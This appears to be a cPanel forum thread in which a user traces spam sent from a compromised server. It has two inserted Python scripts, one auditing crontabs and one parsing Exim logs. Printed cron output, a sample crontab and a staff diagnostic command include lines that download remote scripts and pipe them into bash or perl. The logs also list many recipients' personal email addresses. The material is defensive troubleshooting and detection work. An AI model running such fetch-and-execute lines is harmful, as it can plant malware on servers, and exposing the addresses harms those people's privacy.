SMTP Relay usage

Comments

13 comments

  • Lillike
    As I wrote, Exim was dead but is now running. Naturally, sending emails is limited. The root (Cron Daemon) sends me many emails. Here's one:

    Date: Thu, 31 May 2018 05:42:01 -0700
    From: root@ip-192xxxx.secureserver.net (Cron Daemon)
    To: gc@ip-192xxxx.secureserver.net

    --2018-05-31 05:41:01-- http://example.com/zz1.php?reboot=yes
    Resolving example.com... 192.xxxxx
    Connecting to example.com|192.xxxx|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: "zz1.php?reboot=yes.5868"
    0K 2.21K=0.4s
    2018-05-31 05:42:01 (2.21 KB/s) - "zz1.php?reboot=yes.5868" saved [943]
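The cron mail above is the output of a root cron job fetching zz1.php from a remote host with wget. As an added example that is not part of this thread and not cPanel's code, the following Python script audits crontab text for entries that download remote content, point at remote script files, pipe a download into an interpreter, or run every minute, so that such a job shows up in a routine check instead of only in mailed output. The crontab lines, hosts and paths in it are constructed for the example.

```python
import re

# Constructed sample crontab (the kind of output "crontab -l" prints); every URL and path is made up.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/local/bin/backup.sh >/dev/null 2>&1
*/1 * * * * wget -q -O /tmp/.z http://example.invalid/zz1.php?reboot=yes
15 4 * * * curl -s https://example.invalid/update.txt | bash
30 2 * * 0 /usr/bin/certbot renew --quiet
@reboot curl -o /tmp/run.php http://example.invalid/x.php
"""

FETCH_CMD = re.compile(r'\b(wget|curl|fetch)\b')
REMOTE_URL = re.compile(r'https?://[^\s\'"|;&]+', re.IGNORECASE)
PIPE_TO_INTERP = re.compile(r'\|\s*(sh|bash|zsh|dash|php|perl|python[0-9.]*)\b')
SCRIPT_EXT = re.compile(r'\.(php|pl|py|sh|cgi)(\?|$)', re.IGNORECASE)


def _split_entry(line):
    """Split one crontab line into (schedule, command).

    Returns None for blank lines, comments and VAR=value environment lines.
    """
    line = line.strip()
    if not line or line.startswith('#') or re.match(r'^[A-Za-z_][A-Za-z0-9_]*=', line):
        return None
    if line.startswith('@'):                      # @reboot, @daily, ...
        parts = line.split(None, 1)
    else:                                         # five time fields, then the command
        parts = line.split(None, 5)
        if len(parts) < 6:
            return None
        parts = [' '.join(parts[:5]), parts[5]]
    if len(parts) < 2:
        return None
    return parts[0], parts[1]


def audit_crontab(text):
    """Return a list of findings, one dict per suspicious entry, in crontab order."""
    findings = []
    for line in text.splitlines():
        entry = _split_entry(line)
        if not entry:
            continue
        schedule, command = entry
        reasons = []
        urls = REMOTE_URL.findall(command)
        if FETCH_CMD.search(command) and urls:
            reasons.append('downloads remote content')
        if PIPE_TO_INTERP.search(command):
            reasons.append('pipes output into an interpreter')
        if any(SCRIPT_EXT.search(u) for u in urls):
            reasons.append('remote resource is a script (.php/.pl/...)')
        if schedule.startswith('*/1 ') or schedule.startswith('* * * * *'):
            reasons.append('runs every minute')
        if reasons:
            findings.append({'schedule': schedule, 'command': command,
                             'urls': urls, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{f['schedule']}] {f['command']}\n    -> {', '.join(f['reasons'])}")
```

On a real server you would feed it the output of `crontab -l` for root and for each account (and the files under /etc/cron.d), and review every flagged entry against what the account owner actually installed; an entry that downloads a .php file on a one-minute schedule, as in the mail above, is the kind of thing this check is meant to surface.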
  • rpvw
    A quick Google search for zz1.php turned up lots of sites (most seemed to be WordPress) and indexes, with a fair number marked with the
  • cPanelLauren
    I would also suggest running a malware scan - cPanel offers ClamAV but there are others, if you're not sure what to use. Thanks!
  • Lillike
    Thanks. The problem is solved.
  • cPanelLauren
    Hi @Lillike I'm happy to hear that! Thank you for letting us know.
  • Lillike
    Today the server's over quota... :( ClamAV installed and working... zz1.php... over. Mail delivery reports checked. A lot of files were found with the following message:

    SMTP error from remote mail server after initial connection: 554 p3plsmtpout00xxx.prod.phx3.secxx.net : HOSTING RELAY : Pn5Jf0EURyedJ : DED : You've reached your daily relay quota - 192.xxxx

    Before the above messages:

    Event: defer warning
    Sender User: gc
    Sender Domain: gc.com
    From Address: gc@ip-192-xxxxx.secureserver.net
    Sender: gc
    Sent Time: Jun 4, 2018, 12:51:12 PM
    Sender Host: localhost
    Sender IP: 127.0.0.1
    Authentication: localuser
    Spam Score:
    Recipient: zv393@mail.ru
    Delivered To:
    Delivery User: -system-
    Delivery Domain:
    Router: send_to_smart_host
    Transport: remote_smtp
    Out Time: Jun 4, 2018, 5:07:17 PM
    ID: 1fPn4s-0005Zl-Cg
    Delivery Host:
    Delivery IP:
    Size: 11.96 KB
    Result: retry time not reached for any host for 'mail.ru'

    (All notices are from the same domain and the recipients are from RU.)

    Sent Summary Report from 6/1 to 6/5:

    Domain   User   Successful   Deferrals   Failures   Failed and Deferred   Total Messages   Data Sent
    gc.com   gc     211          1,095,507   35,783     1,131,290             10,738           542.97 KB
             root   30           236         6          242                   18               774.79 KB

    Please advise.
  • cPanelLauren
    Hi @Lillike It sounds like you still have a compromised PHP script on the account. What is the output of the following: exigrep 1fPn4s-0005Zl-Cg /var/log/exim_mainlog
  • Lillike
    A long list received with the following (it's not all):

    stem196@gmail.com sin.antihrista666@mail.ru nikolay.kamenskiy@list.ru artem-ushenin@mail.ru dazzingdemon@mail.ru
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 03:51:06 cwd=/var/spool/exim 3 args: /usr/sbin/exim -Mc 1fPn4s-0005Zl-Cg
    +++ 1fPn4s-0005Zl-Cg has not completed +++
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg <= gc@ip-192-xxxxx.secxxxxx.net U=gc P=local S=12242 id=595CEAB9B26648EB37327BC0E46C5BB6@spartascience.ru T="\320\237\321\200\320\276\321\205\320\276\320\264\320\270 \320\276\320\277\321\200\320\276\321\201\321\213, \320\277\320\276\320\273\321\203\321\207\320\260\320\271 \320\264\320\265\320\275\321\214\320\263\320\270" for pavkov1969@gmail.com nadegdam@list.ru www.promodj@mail.ru badashov50@mail.ru aleninaalena1989@gmail.com santalovanm@mail.ru vladimir.bandin@yandex.ru zv393@mail.ru nikkuningas@rambler.ru esina.irina1549@gmail.com rustem196@gmail.com sin.antihrista666@mail.ru nikolay.kamenskiy@list.ru artem-ushenin@mail.ru dazzingdemon@mail.ru
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == zv393@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nikkuningas@rambler.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'rambler.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == esina.irina1549@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == rustem196@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == sin.antihrista666@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == nikolay.kamenskiy@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == artem-ushenin@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == dazzingdemon@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == badashov50@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == aleninaalena1989@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == santalovanm@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == vladimir.bandin@yandex.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'yandex.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == zv393@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == nikkuningas@rambler.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'rambler.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == esina.irina1549@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == rustem196@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == sin.antihrista666@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == nikolay.kamenskiy@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == artem-ushenin@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 04:03:58 1fPn4s-0005Zl-Cg == dazzingdemon@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == nadegdam@list.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'list.ru'
    2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == badashov50@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == aleninaalena1989@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'gmail.com'
    2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == santalovanm@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
    2018-06-04 06:02:38 1fPn4s-0005Zl-Cg == vladimir.bandin@yandex.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'yandex.ru'
    /bin/bash: -c: line 0: syntax error near unexpected token `('
    /bin/bash: -c: line 0: `lessecho -p0x22 -d0x22 -e\\ -n0x3b -n0x20 -n0x2a -n0x3f -n0x9 -n0xa -n0x27 -n0x22 -n0x28 -n0x29 -n0x3c -n0x3e -n0x5b -n0x5d -n0x7c -n0x26 -n0x5e -n0x60 -n0x23 -n0x5c -n0x24 -n0x25 -n0x3d -n0x7e -- -0005Zl-Cg == pavkov1969@gmail.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not
    2018-06-04 08:07:49 1fPn4s-0005Zl-Cg == dazzingdemon@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
  • cPanelLauren
    Hi @Lillike Can you run the command again but omit these lines?

    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg == www.promodj@mail.ru R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'mail.ru'
  • rpvw
    If you are constantly getting the symptoms of malware manifesting on your server, you may need to consider the two following resources:

    Tips to Make Your Server More Secure - cPanel Knowledge Base - cPanel Documentation
    Why can't I clean a hacked machine - cPanel Knowledge Base - cPanel Documentation
  • Lillike
    rpvw: ClamAV, ModSecurity, firewall etc. are working...

    Lauren: I ran the command exigrep 1fPn4s-0005Zl-Cg /var/log/exim_mainlog:

    +++ 1fPn4s-0005Zl-Cg has not completed +++
    2018-06-04 03:51:06 1fPn4s-0005Zl-Cg <= gc@ip-192-xxxx.secureserver.net U=gc P=local S=12242 id=595CEAB9B26648EB37327BC0E46C5BB6@spartascience.ru T="\320\237\321\200\320\276\321\205\320\276\320\264\320\270 \320\276\320\277\321\200\320\276\321\201\321\213, \320\277\320\276\320\273\321\203\321\207\320\260\320\271 \320\264\320\265\320\275\321\214\320\263\320\270" for pavkov1969@gmail.com nadegdam@list.ru www.promodj@mail.ru badashov50@mail.ru aleninaalena1989@gmail.com santalovanm@mail.ru vladimir.bandin@yandex.ru zv393@mail.ru nikkuningas@rambler.ru esina.irina1549@gmail.com rustem196@gmail.com sin.antihrista666@mail.ru nikolay.kamenskiy@list.ru artem-ushenin@mail.ru dazzingdemon@mail.ru
    .....
  • cPanelLauren
    Hi @Lillike This shows us that the user gc is sending mail, but that is most likely because a script is responsible for it. Since the message hasn't been sent yet, you can view the headers:

    exim -Mvh 1fPn4s-0005Zl-Cg

    But ultimately what you need to find is where the message originated from within the user's account. Something we use to quickly identify the source of spam mail:

    perl <(curl -s https://raw.githubusercontent.com/cPanelTechs/SSE/master/sse.pl) -s

    It should point out where that mail is coming from, though I think the entire gc user directory needs to be audited at this point.
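The exigrep output in this thread has the shape that points at a script on the account: a message injected locally (P=local) by the Unix user gc with fifteen recipients at external domains, then one `==` deferral line per recipient on every queue run. As an added example that is neither cPanel's code nor the SSE script linked above, the following Python parses exim_mainlog arrival (`<=`), delivery (`=>`) and deferral (`==`) lines, attributes each message to the identity that injected it (local user from U=, SMTP AUTH login from A=, otherwise the remote host from H=), summarises per source, and flags locally submitted messages with an unusually long recipient list. The log excerpt, message IDs, users and addresses are constructed; the field layout follows Exim's main-log format, and the recipient list after "for" assumes the received_recipients log selector is on, as it is in the thread's log.

```python
import re
from collections import Counter, defaultdict

# Constructed sample exim_mainlog excerpt; IDs, users, hosts and addresses are placeholders.
SAMPLE_LOG = """\
2018-06-04 03:51:06 1aAAAA-000001-AA <= gc@host.example.net U=gc P=local S=12242 id=ABC123@example.invalid T="Subject one" for r1@example.com r2@example.org r3@example.net r4@example.com r5@example.org
2018-06-04 03:51:06 1aAAAA-000001-AA == r1@example.com R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'example.com'
2018-06-04 03:51:06 1aAAAA-000001-AA == r2@example.org R=send_to_smart_host T=remote_smtp defer (-53): retry time not reached for any host for 'example.org'
2018-06-04 03:52:00 1aAAAA-000002-BB <= root@host.example.net U=root P=local S=943 T="Cron <root@host> /usr/bin/wget -q http://example.invalid/zz1.php" for gc@host.example.net
2018-06-04 03:52:01 1aAAAA-000002-BB => gc@host.example.net R=localuser T=local_delivery
2018-06-04 03:55:00 1aAAAA-000003-CC <= alice@example.net H=(client) [192.0.2.55] P=esmtpsa A=dovecot_login:alice S=2048 T="hello" for bob@example.com
2018-06-04 03:55:01 1aAAAA-000003-CC => bob@example.com R=send_to_smart_host T=remote_smtp H=smtp.example.net [192.0.2.99]
"""

# "<=" arrival: the greedy .* makes " for " bind to the last occurrence, i.e. the recipient list.
ARRIVAL_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<id>\S+) <= (?P<sender>\S+) '
    r'(?P<fields>.*) for (?P<rcpts>\S+(?: \S+)*)$')
DELIVERY_RE = re.compile(r'^(?P<ts>\S+ \S+) (?P<id>\S+) => (?P<rcpt>\S+) ')
DEFER_RE = re.compile(
    r'^(?P<ts>\S+ \S+) (?P<id>\S+) == (?P<rcpt>\S+) .*\bdefer \((?P<code>-?\d+)\): (?P<reason>.*)$')
SUBJECT_RE = re.compile(r'T="((?:[^"\\]|\\.)*)"')


def _field(fields, key):
    """Value of a KEY=value token in the arrival line, or None if absent."""
    m = re.search(r'(?:^| )' + re.escape(key) + r'=(\S+)', fields)
    return m.group(1) if m else None


def parse_log(text):
    """Return {message id: record} with recipients, delivery and deferral counts."""
    messages = {}
    for line in text.splitlines():
        m = ARRIVAL_RE.match(line)
        if m:
            fields = m.group('fields')
            subj = SUBJECT_RE.search(fields)
            messages[m.group('id')] = {
                'id': m.group('id'), 'ts': m.group('ts'), 'sender': m.group('sender'),
                'user': _field(fields, 'U'), 'protocol': _field(fields, 'P'),
                'auth': _field(fields, 'A'), 'host': _field(fields, 'H'),
                'size': int(_field(fields, 'S') or 0),
                'subject': subj.group(1) if subj else None,
                'recipients': m.group('rcpts').split(),
                'deferred': Counter(), 'delivered': 0,
            }
            continue
        m = DEFER_RE.match(line)
        if m and m.group('id') in messages:
            messages[m.group('id')]['deferred'][m.group('rcpt')] += 1
            continue
        m = DELIVERY_RE.match(line)
        if m and m.group('id') in messages:
            messages[m.group('id')]['delivered'] += 1
    return messages


def source_of(msg):
    """Identity that injected the message: local Unix user, SMTP AUTH login, or remote host."""
    if msg['protocol'] == 'local' and msg['user']:
        return 'local:' + msg['user']
    if msg['auth']:
        return 'auth:' + msg['auth']
    return 'remote:' + (msg['host'] or 'unknown')


def per_source_report(messages):
    """Aggregate message, recipient, delivery and deferral counts per injecting identity."""
    report = defaultdict(lambda: {'messages': 0, 'recipients': 0, 'delivered': 0,
                                  'deferred': 0, 'domains': Counter()})
    for msg in messages.values():
        r = report[source_of(msg)]
        r['messages'] += 1
        r['recipients'] += len(msg['recipients'])
        r['delivered'] += msg['delivered']
        r['deferred'] += sum(msg['deferred'].values())
        r['domains'].update(a.rsplit('@', 1)[-1].lower() for a in msg['recipients'])
    return dict(report)


def flag_bulk_local_submissions(messages, min_recipients=10):
    """IDs of locally injected messages with at least min_recipients recipients, in log order."""
    return [m['id'] for m in messages.values()
            if m['protocol'] == 'local' and len(m['recipients']) >= min_recipients]


if __name__ == '__main__':
    msgs = parse_log(SAMPLE_LOG)
    for src, r in per_source_report(msgs).items():
        print(f"{src}: {r['messages']} msg, {r['recipients']} rcpt, "
              f"{r['delivered']} delivered, {r['deferred']} deferrals, top domains {r['domains'].most_common(3)}")
    print('bulk local submissions:', flag_bulk_local_submissions(msgs, min_recipients=5))
```

Run against a real /var/log/exim_mainlog, the per-source table separates legitimate authenticated senders (auth:...) from script-injected mail (local:user), and the flagged IDs are the ones worth inspecting with `exim -Mvh` as suggested above; the threshold is a tuning knob, not a fixed rule, since a genuine mailing-list post can also have many recipients.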